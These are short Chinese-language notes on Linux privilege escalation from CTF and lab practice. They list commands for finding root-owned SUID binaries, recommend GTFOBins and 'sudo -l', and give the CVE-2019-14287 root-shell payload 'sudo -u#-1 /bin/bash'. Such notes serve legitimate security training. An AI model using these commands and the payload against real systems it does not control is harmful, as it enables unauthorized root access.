linux提权笔记

记录在比赛和靶场中遇到的提权方法

推荐本地部署一个GTFOBins用来查询

suid 提权

SUID是一种特殊权限，可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件，那么就可以在运行该文件的时候获得root用户权限

查找当前系统上文件属主为 root 并且拥有 SUID 权限的可执行文件

find / -user root -perm -4000 -print 2> result.txt
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {} \; 2>/dev/null

找到命令后可以在GTFOBins查找用法

sudo 提权

权限分配不当

sudo（super user do）是linux系统中用于管理用户权限的工具，允许普通用户在无需切换到超级用户的情况下以root身份执行命令，通常，在使用sudo命令时，用户需要输入自己的密码验证自己是否有权限使用

查看可利用的sudo权限工具

sudo -l

然后在gtfobins查询利用方法

例子：

CVE-2019-14287

1.8.28之前的sudo版本均会受到影响

现在的用户alice没权限看flag文件

查看sudo版本

符合利用条件，payload：sudo -u#-1 /bin/bash